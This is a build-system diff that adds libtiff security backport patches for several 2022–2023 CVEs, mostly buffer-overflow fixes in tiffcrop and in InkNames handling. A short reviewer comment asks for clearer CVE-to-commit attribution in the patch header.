+- (unsigned long)stripsize);
++ TIFFError("", "Strip %"PRIu32": read %"PRId64" bytes, strip size %"PRIu64,
++ strip + 1, bytes_read, stripsize);
+
+ if (bytes_read < 0 && !ignore) {
+- TIFFError("", "Error reading strip %lu after %lu rows",
+- (unsigned long) strip, (unsigned long)rows);
++ TIFFError("", "Error reading strip %"PRIu32" after %"PRIu64" rows",
++ strip, rows);
+ return 0;
+ }
+ bufp += stripsize;
+@@ -4164,13 +4180,13 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ /* If we have a full buffer's worth, write it out */
+ if (ready_bits >= 32)
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -4213,10 +4229,10 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ "Row %3d, Col %3d, Src byte offset %3d bit offset %2d Dst offset %3d",
+ row + 1, col + 1, src_byte, src_bit, dst - out);
+
+- dump_long (dumpfile, format, "Match bits ", matchbits);
++ dump_wide (dumpfile, format, "Match bits ", matchbits);
+ dump_data (dumpfile, format, "Src bits ", src, 4);
+- dump_long (dumpfile, format, "Buff1 bits ", buff1);
+- dump_long (dumpfile, format, "Buff2 bits ", buff2);
++ dump_wide (dumpfile, format, "Buff1 bits ", buff1);
++ dump_wide (dumpfile, format, "Buff2 bits ", buff2);
+ dump_byte (dumpfile, format, "Write bits1", bytebuff1);
+ dump_byte (dumpfile, format, "Write bits2", bytebuff2);
+ dump_info (dumpfile, format, "", "Ready bits: %2d", ready_bits);
+@@ -4689,13 +4705,13 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ /* If we have a full buffer's worth, write it out */
+ if (ready_bits >= 32)
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -4738,10 +4754,10 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ "Row %3d, Col %3d, Src byte offset %3d bit offset %2d Dst offset %3d",
+ row + 1, col + 1, src_byte, src_bit, dst - out);
+
+- dump_long (dumpfile, format, "Match bits ", matchbits);
++ dump_wide (dumpfile, format, "Match bits ", matchbits);
+ dump_data (dumpfile, format, "Src bits ", src, 4);
+- dump_long (dumpfile, format, "Buff1 bits ", buff1);
+- dump_long (dumpfile, format, "Buff2 bits ", buff2);
++ dump_wide (dumpfile, format, "Buff1 bits ", buff1);
++ dump_wide (dumpfile, format, "Buff2 bits ", buff2);
+ dump_byte (dumpfile, format, "Write bits1", bytebuff1);
+ dump_byte (dumpfile, format, "Write bits2", bytebuff2);
+ dump_info (dumpfile, format, "", "Ready bits: %2d", ready_bits);
+@@ -4764,7 +4780,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+ {
+ int i, bytes_per_sample, bytes_per_pixel, shift_width, result = 1;
+ uint32 j;
+- int32 bytes_read = 0;
++ tmsize_t bytes_read = 0;
+ uint16 bps = 0, planar;
+ uint32 nstrips;
+ uint32 strips_per_sample;
+@@ -4830,7 +4846,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+ for (s = 0; (s < spp) && (s < MAX_SAMPLES); s++)
+ {
+ srcbuffs[s] = NULL;
+- buff = _TIFFmalloc(stripsize + 3);
++ buff = _TIFFmalloc(stripsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!buff)
+ {
+ TIFFError ("readSeparateStripsIntoBuffer",
+@@ -4853,7 +4869,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+ buff = srcbuffs[s];
+ strip = (s * strips_per_sample) + j;
+ bytes_read = TIFFReadEncodedStrip (in, strip, buff, stripsize);
+- rows_this_strip = bytes_read / src_rowsize;
++ rows_this_strip = (uint32)(bytes_read / src_rowsize);
+ if (bytes_read < 0 && !ignore)
+ {
+ TIFFError(TIFFFileName(in),
+@@ -5860,13 +5876,14 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ uint16 input_compression = 0, input_photometric = 0;
+ uint16 subsampling_horiz, subsampling_vert;
+ uint32 width = 0, length = 0;
+- uint32 stsize = 0, tlsize = 0, buffsize = 0, scanlinesize = 0;
++ tmsize_t stsize = 0, tlsize = 0, buffsize = 0;
++ tmsize_t scanlinesize = 0;
+ uint32 tw = 0, tl = 0; /* Tile width and length */
+- uint32 tile_rowsize = 0;
++ tmsize_t tile_rowsize = 0;
+ unsigned char *read_buff = NULL;
+ unsigned char *new_buff = NULL;
+ int readunit = 0;
+- static uint32 prev_readsize = 0;
++ static tmsize_t prev_readsize = 0;
+
+ TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
+ TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
+@@ -6168,7 +6185,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+ return (-1);
+ }
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
++ read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ {
+@@ -6179,11 +6196,11 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+ return (-1);
+ }
+- new_buff = _TIFFrealloc(read_buff, buffsize+3);
++ new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!new_buff)
+ {
+ free (read_buff);
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
++ read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ read_buff = new_buff;
+@@ -6256,8 +6273,13 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ dump_info (dump->infile, dump->format, "",
+ "Bits per sample %d, Samples per pixel %d", bps, spp);
+
++ if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
++ dump_info(dump->infile, dump->format, "loadImage",
++ "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
++ (uint64_t)scanlinesize);
++ }
+ for (i = 0; i < length; i++)
+- dump_buffer(dump->infile, dump->format, 1, scanlinesize,
++ dump_buffer(dump->infile, dump->format, 1, (uint32)scanlinesize,
+ i, read_buff + (i * scanlinesize));
+ }
+ return (0);
+@@ -7277,13 +7299,13 @@ writeSingleSection(TIFF *in, TIFF *out, struct image_data *image,
+ if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
+ TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
+ if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
+- int inknameslen = strlen(inknames) + 1;
++ int inknameslen = (int)strlen(inknames) + 1;
+ const char* cp = inknames;
+ while (ninks > 1) {
+ cp = strchr(cp, '\0');
+ if (cp) {
+ cp++;
+- inknameslen += (strlen(cp) + 1);
++ inknameslen += ((int)strlen(cp) + 1);
+ }
+ ninks--;
+ }
+@@ -7346,23 +7368,23 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
+
+ if (!sect_buff)
+ {
+- sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
++ sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!sect_buff)
+ {
+ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+ return (-1);
+ }
+- _TIFFmemset(sect_buff, 0, sectsize);
++ _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ {
+ if (prev_sectsize < sectsize)
+ {
+- new_buff = _TIFFrealloc(sect_buff, sectsize);
++ new_buff = _TIFFrealloc(sect_buff, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!new_buff)
+ {
+ free (sect_buff);
+- sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
++ sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ sect_buff = new_buff;
+@@ -7372,7 +7394,7 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
+ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+ return (-1);
+ }
+- _TIFFmemset(sect_buff, 0, sectsize);
++ _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ }
+
+@@ -7403,17 +7425,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ cropsize = crop->bufftotal;
+ crop_buff = seg_buffs[0].buffer;
+ if (!crop_buff)
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ else
+ {
+ prev_cropsize = seg_buffs[0].size;
+ if (prev_cropsize < cropsize)
+ {
+- next_buff = _TIFFrealloc(crop_buff, cropsize);
++ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (! next_buff)
+ {
+ _TIFFfree (crop_buff);
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ crop_buff = next_buff;
+@@ -7426,7 +7448,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ return (-1);
+ }
+
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ seg_buffs[0].buffer = crop_buff;
+ seg_buffs[0].size = cropsize;
+
+@@ -7505,17 +7527,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ cropsize = crop->bufftotal;
+ crop_buff = seg_buffs[i].buffer;
+ if (!crop_buff)
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ else
+ {
+ prev_cropsize = seg_buffs[0].size;
+ if (prev_cropsize < cropsize)
+ {
+- next_buff = _TIFFrealloc(crop_buff, cropsize);
++ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (! next_buff)
+ {
+ _TIFFfree (crop_buff);
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ crop_buff = next_buff;
+@@ -7528,7 +7550,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ return (-1);
+ }
+
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ seg_buffs[i].buffer = crop_buff;
+ seg_buffs[i].size = cropsize;
+
+@@ -7641,24 +7663,24 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ crop_buff = *crop_buff_ptr;
+ if (!crop_buff)
+ {
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!crop_buff)
+ {
+ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+ return (-1);
+ }
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ prev_cropsize = cropsize;
+ }
+ else
+ {
+ if (prev_cropsize < cropsize)
+ {
+- new_buff = _TIFFrealloc(crop_buff, cropsize);
++ new_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!new_buff)
+ {
+ free (crop_buff);
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ crop_buff = new_buff;
+@@ -7667,7 +7689,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+ return (-1);
+ }
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ }
+
+@@ -7965,13 +7987,13 @@ writeCroppedImage(TIFF *in, TIFF *out, struct image_data *image,
+ if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
+ TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
+ if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
+- int inknameslen = strlen(inknames) + 1;
++ int inknameslen = (int)strlen(inknames) + 1;
+ const char* cp = inknames;
+ while (ninks > 1) {
+ cp = strchr(cp, '\0');
+ if (cp) {
+ cp++;
+- inknameslen += (strlen(cp) + 1);
++ inknameslen += ((int)strlen(cp) + 1);
+ }
+ ninks--;
+ }
+@@ -8356,13 +8378,13 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+ }
+ else /* If we have a full buffer's worth, write it out */
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -8431,12 +8453,13 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ return (-1);
+ }
+
+- if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize)))
++ /* Add 3 padding bytes for extractContigSamplesShifted32bits */
++ if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
+ {
+- TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize);
++ TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ return (-1);
+ }
+- _TIFFmemset(rbuff, '\0', buffsize);
++ _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
+
+ ibuff = *ibuff_ptr;
+ switch (rotation)
+@@ -8964,13 +8987,13 @@ reverseSamples32bits (uint16 spp, uint16 bps, uint32 width,
+ }
+ else /* If we have a full buffer's worth, write it out */
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -9061,12 +9084,13 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+ {
+ case MIRROR_BOTH:
+ case MIRROR_VERT:
+- line_buff = (unsigned char *)_TIFFmalloc(rowsize);
++ line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (line_buff == NULL)
+ {
+- TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize);
++ TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ return (-1);
+ }
++ _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+
+ dst = ibuff + (rowsize * (length - 1));
+ for (row = 0; row < length / 2; row++)
+@@ -9098,11 +9122,12 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+ }
+ else
+ { /* non 8 bit per sample data */
+- if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + 1)))
++ if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES)))
+ {
+ TIFFError("mirrorImage", "Unable to allocate mirror line buffer");
+ return (-1);
+ }
++ _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ bytes_per_sample = (bps + 7) / 8;
+ bytes_per_pixel = ((bps * spp) + 7) / 8;
+ if (bytes_per_pixel < (bytes_per_sample + 1))
+@@ -9114,7 +9139,7 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+ {
+ row_offset = row * rowsize;
+ src = ibuff + row_offset;
+- _TIFFmemset (line_buff, '\0', rowsize);
++ _TIFFmemset (line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ switch (shift_width)
+ {
+ case 1: if (reverseSamples16bits(spp, bps, width, src, line_buff))
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
new file mode 100644
index 0000000000..18a4b4e0ff
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
@@ -0,0 +1,123 @@
+From f7c06c395daf1b2c52ab431e00db2d9fc2ac993e Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 10 May 2022 20:03:17 +0000
+Subject: [PATCH] tiffcrop: Fix issue #330 and some more from 320 to 349
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3597 CVE-2022-3626 CVE-2022-3627
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/e319508023580e2f70e6e626f745b5b2a1707313
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/8fe3735942ea1d90d8cef843b55b3efe8ab6feaf
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/bad48e90b410df32172006c7876da449ba62cdba
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/236b7191f04c60d09ee836ae13b50f812c841047
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+---
+ tools/tiffcrop.c | 50 ++++++++++++++++++++++++++++++++++++++++--------
+ 1 file changed, 42 insertions(+), 8 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c923920..a0789a3 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -103,7 +103,12 @@
+ * selects which functions dump data, with higher numbers selecting
+ * lower level, scanline level routines. Debug reports a limited set
+ * of messages to monitor progess without enabling dump logs.
+- */
++ *
++ * Note 1: The (-X|-Y), -Z, -z and -S options are mutually exclusive.
++ * In no case should the options be applied to a given selection successively.
++ * Note 2: Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
++ * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
++ */
+
+ static char tiffcrop_version_id[] = "2.4.1";
+ static char tiffcrop_rev_date[] = "03-03-2010";
+@@ -176,12 +181,12 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
+ #define ROTATECW_270 32
+ #define ROTATE_ANY (ROTATECW_90 | ROTATECW_180 | ROTATECW_270)
+
+-#define CROP_NONE 0
+-#define CROP_MARGINS 1
+-#define CROP_WIDTH 2
+-#define CROP_LENGTH 4
+-#define CROP_ZONES 8
+-#define CROP_REGIONS 16
++#define CROP_NONE 0 /* "-S" -> Page_MODE_ROWSCOLS and page->rows/->cols != 0 */
++#define CROP_MARGINS 1 /* "-m" */
++#define CROP_WIDTH 2 /* "-X" */
++#define CROP_LENGTH 4 /* "-Y" */
++#define CROP_ZONES 8 /* "-Z" */
++#define CROP_REGIONS 16 /* "-z" */
+ #define CROP_ROTATE 32
+ #define CROP_MIRROR 64
+ #define CROP_INVERT 128
+@@ -323,7 +328,7 @@ struct crop_mask {
+ #define PAGE_MODE_RESOLUTION 1
+ #define PAGE_MODE_PAPERSIZE 2
+ #define PAGE_MODE_MARGINS 4
+-#define PAGE_MODE_ROWSCOLS 8
++#define PAGE_MODE_ROWSCOLS 8 /* for -S option */
+
+ #define INVERT_DATA_ONLY 10
+ #define INVERT_DATA_AND_TAG 11
+@@ -754,6 +759,12 @@ static char* usage_info[] = {
+ " The four debug/dump options are independent, though it makes little sense to",
+ " specify a dump file without specifying a detail level.",
+ " ",
++"Note 1: The (-X|-Y), -Z, -z and -S options are mutually exclusive.",
++" In no case should the options be applied to a given selection successively.",
++" ",
++"Note 2: Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options",
++" such as - H, -V, -P, -J or -K are not supported and may cause buffer overflows.",
++" ",
+ NULL
+ };
+
+@@ -2112,6 +2123,27 @@ void process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
+ /*NOTREACHED*/
+ }
+ }
++ /*-- Check for not allowed combinations (e.g. -X, -Y and -Z, -z and -S are mutually exclusive) --*/
++ char XY, Z, R, S;
++ XY = ((crop_data->crop_mode & CROP_WIDTH) || (crop_data->crop_mode & CROP_LENGTH)) ? 1 : 0;
++ Z = (crop_data->crop_mode & CROP_ZONES) ? 1 : 0;
++ R = (crop_data->crop_mode & CROP_REGIONS) ? 1 : 0;
++ S = (page->mode & PAGE_MODE_ROWSCOLS) ? 1 : 0;
++ if (XY + Z + R + S > 1) {
++ TIFFError("tiffcrop input error", "The crop options(-X|-Y), -Z, -z and -S are mutually exclusive.->exit");
++ exit(EXIT_FAILURE);
++ }
++
++ /* Check for not allowed combination:
++ * Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
++ * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
++. */
++ if ((XY + Z + R > 0) && page->mode != PAGE_MODE_NONE) {
++ TIFFError("tiffcrop input error",
++ "Any of the crop options -X, -Y, -Z and -z together with other PAGE_MODE_x options such as - H, -V, -P, -J or -K is not supported and may cause buffer overflows..->exit");
++ exit(EXIT_FAILURE);
++ }
++
+ } /* end process_command_opts */
+
+ /* Start a new output file if one has not been previously opened or
+@@ -2384,6 +2416,7 @@ main(int argc, char* argv[])
+ exit (-1);
+ }
+
++ /* Crop input image and copy zones and regions from input image into seg_buffs or crop_buff. */
+ if (crop.selections > 0)
+ {
+ if (processCropSelections(&image, &crop, &read_buff, seg_buffs))
+@@ -2400,6 +2433,7 @@ main(int argc, char* argv[])
+ exit (-1);
+ }
+ }
++ /* Format and write selected image parts to output file(s). */
+ if (page.mode == PAGE_MODE_NONE)
+ { /* Whole image or sections not based on output page size */
+ if (crop.selections > 0)
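Review bot: The header of this patch names three CVEs and four `Origin:` commits but does not say which commit addresses which CVE, and the `From` hash `f7c06c395daf…` on its first line is none of the four upstream commits listed. Anyone auditing the backport has to compare all four upstream commits against the 42 added lines to confirm that nothing else came along with them. I would add one header line per CVE in the form `CVE-XXXX-NNNN: <upstream commit URL>` (placeholders, to be filled in from the Debian changelog). A short remark that the `From` hash is presumably the Debian packaging commit rather than an upstream one would also help.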
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
new file mode 100644
index 0000000000..b3232d9002
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
@@ -0,0 +1,277 @@
+From 01bca7e6f608da7696949fca6acda78b9935ba19 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Tue, 30 Aug 2022 16:56:48 +0200
+Subject: [PATCH] Revised handling of TIFFTAG_INKNAMES and related
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3599 CVE-2022-4645 CVE-2023-30774
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/e813112545942107551433d61afd16ac094ff246
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ TIFFTAG_NUMBEROFINKS value
+
+In order to solve the buffer overflow issues related to TIFFTAG_INKNAMES and related TIFFTAG_NUMBEROFINKS value, a revised handling of those tags within LibTiff is proposed:
+
+Behaviour for writing:
+ `NumberOfInks` MUST fit to the number of inks in the `InkNames` string.
+ `NumberOfInks` is automatically set when `InkNames` is set.
+ If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
+ If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
+
+Behaviour for reading:
+ When reading `InkNames` from a TIFF file, the `NumberOfInks` will be set automatically to the number of inks in `InkNames` string.
+ If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
+ If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
+
+This allows the safe use of the NumberOfInks value to read out the InkNames without buffer overflow
+
+This MR will close the following issues: #149, #150, #152, #168 (to be checked), #250, #269, #398 and #456.
+
+It also fixes the old bug at http://bugzilla.maptools.org/show_bug.cgi?id=2599, for which the limitation of `NumberOfInks = SPP` was introduced, which is in my opinion not necessary and does not solve the general issue.
+
+---
+ libtiff/tif_dir.c | 120 ++++++++++++++++++++++++-----------------
+ libtiff/tif_dir.h | 2 +
+ libtiff/tif_dirinfo.c | 2 +-
+ libtiff/tif_dirwrite.c | 5 ++
+ libtiff/tif_print.c | 4 ++
+ 5 files changed, 83 insertions(+), 50 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 39aeeb4..9d8267a 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -29,6 +29,7 @@
+ * (and also some miscellaneous stuff)
+ */
+ #include "tiffiop.h"
++# include <inttypes.h>
+
+ /*
+ * These are used in the backwards compatibility code...
+@@ -137,32 +138,30 @@ setExtraSamples(TIFF* tif, va_list ap, uint32* v)
+ }
+
+ /*
+- * Confirm we have "samplesperpixel" ink names separated by \0. Returns
++ * Count ink names separated by \0. Returns
+ * zero if the ink names are not as expected.
+ */
+-static uint32
+-checkInkNamesString(TIFF* tif, uint32 slen, const char* s)
++static uint16
++countInkNamesString(TIFF *tif, uint32 slen, const char *s)
+ {
+- TIFFDirectory* td = &tif->tif_dir;
+- uint16 i = td->td_samplesperpixel;
++ uint16 i = 0;
++ const char *ep = s + slen;
++ const char *cp = s;
+
+ if (slen > 0) {
+- const char* ep = s+slen;
+- const char* cp = s;
+- for (; i > 0; i--) {
++ do {
+ for (; cp < ep && *cp != '\0'; cp++) {}
+ if (cp >= ep)
+ goto bad;
+ cp++; /* skip \0 */
+- }
+- return ((uint32)(cp-s));
++ i++;
++ } while (cp < ep);
++ return (i);
+ }
+ bad:
+ TIFFErrorExt(tif->tif_clientdata, "TIFFSetField",
+- "%s: Invalid InkNames value; expecting %d names, found %d",
+- tif->tif_name,
+- td->td_samplesperpixel,
+- td->td_samplesperpixel-i);
++ "%s: Invalid InkNames value; no NUL at given buffer end location %"PRIu32", after %"PRIu16" ink",
++ tif->tif_name, slen, i);
+ return (0);
+ }
+
+@@ -476,13 +475,61 @@ _TIFFVSetField(TIFF* tif, uint32 tag, va_list ap)
+ _TIFFsetFloatArray(&td->td_refblackwhite, va_arg(ap, float*), 6);
+ break;
+ case TIFFTAG_INKNAMES:
+- v = (uint16) va_arg(ap, uint16_vap);
+- s = va_arg(ap, char*);
+- v = checkInkNamesString(tif, v, s);
+- status = v > 0;
+- if( v > 0 ) {
+- _TIFFsetNString(&td->td_inknames, s, v);
+- td->td_inknameslen = v;
++ {
++ v = (uint16) va_arg(ap, uint16_vap);
++ s = va_arg(ap, char*);
++ uint16 ninksinstring;
++ ninksinstring = countInkNamesString(tif, v, s);
++ status = ninksinstring > 0;
++ if(ninksinstring > 0 ) {
++ _TIFFsetNString(&td->td_inknames, s, v);
++ td->td_inknameslen = v;
++ /* Set NumberOfInks to the value ninksinstring */
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
++ {
++ if (td->td_numberofinks != ninksinstring) {
